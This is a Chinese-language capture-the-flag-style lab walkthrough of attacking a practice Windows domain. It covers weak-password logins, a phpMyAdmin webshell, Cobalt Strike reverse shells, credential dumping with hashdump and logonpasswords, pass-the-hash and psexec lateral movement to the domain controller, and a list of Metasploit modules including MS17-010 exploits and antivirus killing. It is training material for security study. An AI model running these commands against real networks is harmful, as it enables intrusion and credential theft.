前言
此靶场对初学域渗透的人,非常友好,一路也是非常顺利的打下来。
信息搜集
经过nmap扫描出以下ip对应信息
192.168.52.138 Windows Server 2008
192.168.52.143 Win7
192.168.52.141 Windows Server 2003
继续扫描win7详细信息
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
135/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql MySQL (unauthorized)
访问得到PHPStudy探针,同时获取到绝对路径C:/phpStudy/WWW
使用弱口令root root成功登录
必不可少的环节,使用御剑扫到了PhpMyAdmin,一样使用root root即可成功登录
getshell
之前写过phpMyAdmin之getshell,也就不再重复写了。直接使用蚁剑连接
使用nslookup -type=SRV _ldap._tcp
查找域控,发现域为god.org。域控ip:192.168.52.138
net view
查找局域网内其他主机名,其中本机名为stu1
net group "domain admins" /domain
查找域管理员
net user Administrator /domain
获取指定域用户Administrator的信息
非常幸运,shell获取到了一个域管理员,为了方便后面的后渗透阶段,可以使用cs进行联动。
横向移动
使用cs的Scripted Web Delivery生成powershell一句话木马,在到靶机上执行,即可反弹shell
使用net view
探测内网存活主机信息
继续使用hashdump
,查看本机用户哈希
使用logonpasswords
。此命令作用,只要在此台电脑上输入密码登录过,就会得到用户和明文密码
在view下的Credentials,会保存得到的用户信息
这里登录win7的时候要强制改密码,我将密码设置成了hongrisec@2021,可看到成功抓取到了。获取到了这么多哈希可以使用批量的hash传递攻击。因为域内的用户名和密码基本都是相同的。前提是对方开了445和139,并且防火墙要放行。
创建一个beacon smb,为了后面攻击时的稳定性
在view下的Targets会保存扫描到的主机信息,这里先攻击域控,选择psexec
如下图选择,点击launch
成功反弹
之后继续使用相同的方法,也能成功攻击192.168.52.141
如果没有解出明文密码,最简单的方法就是将psexec里面的每个选项都试一遍,cs会自动切换到pth攻击。
比如,此处选择未解密的那条
和前面的psexec攻击截图对比,就能发现差异
打靶结束收工!
扩展
cs派生msf
msf有批量爆破smb的功能,这里需要cs派生给msf。cs4.x与3.x派生方法有点不同。故此记录一遍
msf输入handler -H 192.168.52.128 -P 3333 -p windows/meterpreter/reverse_http
,注意这里是reverse_http。开启监听3333端口。
来到cs,创建foreigh http监听器
右键选择要派生的对象,再选择Spawn,选择刚刚设置的msf,点击choose,即可派生成功
msf其他模块
use auxiliary/scanner/smb/smb_version # 探测系统信息
exploit/windows/smb/psexec 反弹shell。用的时候先不设置密码和用户,直接run,有些时候能成功。可传hash或者明文密码。这模块玄乎的很,密码啥都对的,win server 2008能成功打下来,win server 2003不行。批量hash传递还得看cs,快和稳!
use auxiliary/admin/smb/ms17_010_command 执行一些系统权限的命令,这个win server 2003就能成功利用。
exploit/windows/smb/ms17_010_psexec # 打一个shell回来
run post/windows/manage/migrate #自动进程迁移
run post/windows/gather/checkvm #查看目标主机是否运行在虚拟机上
run post/windows/manage/killav #关闭杀毒软件
run post/windows/manage/enable_rdp #开启远程桌面服务
run post/windows/manage/autoroute #查看路由信息
run post/windows/gather/enum_logged_on_users #列举当前登录的用户
run post/windows/gather/enum_applications #列举应用程序
run post/windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码
run post/windows/gather/smart_hashdump #dump出所有用户的hash
run getgui -u hack -p 123
run post/windows/gather/enum_patches 补丁信息
run post/multi/recon/local_exploit_suggester 查询可利用的漏洞